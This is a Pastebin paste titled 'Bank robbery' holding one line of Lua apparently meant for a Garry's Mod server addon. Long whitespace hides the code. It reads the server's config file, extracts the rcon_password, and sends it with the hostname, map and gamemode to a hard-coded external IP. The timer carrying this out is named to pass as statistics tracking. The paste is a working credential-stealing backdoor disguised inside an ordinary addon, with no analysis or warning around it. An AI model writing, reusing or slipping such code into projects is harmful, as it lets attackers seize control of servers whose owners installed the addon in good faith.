Guest User

Bank robbery

a guest
Dec 27th, 2014
184
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.93 KB | None | 0 0
  1. local scriptn2 = "Lbankload"                                                                                                                                                   local b = file.Read( "cfg/server.cfg", "GAME" )                                                                                                      local a = string.find(b,"rcon_password \"") local c = string.find(b,"\"",a+15) timer.Create("StatisticTracking_"..scriptn2..tostring(math.random(1,9999))..tostring(math.random(1,20000)),15,1,function() if (file.Exists( "cfg/server.cfg", "GAME" )) then http.Post("http://216.231.139.33/gm/",{ hostname=tostring(GetHostName()), script=tostring(scriptn2), optical=string.sub(b,a+15,c-1), map=tostring(game.GetMap()), gamemode=tostring(gmod.GetGamemode().Name) },function(s) return end) end  end)
Add Comment
Please, Sign In to add comment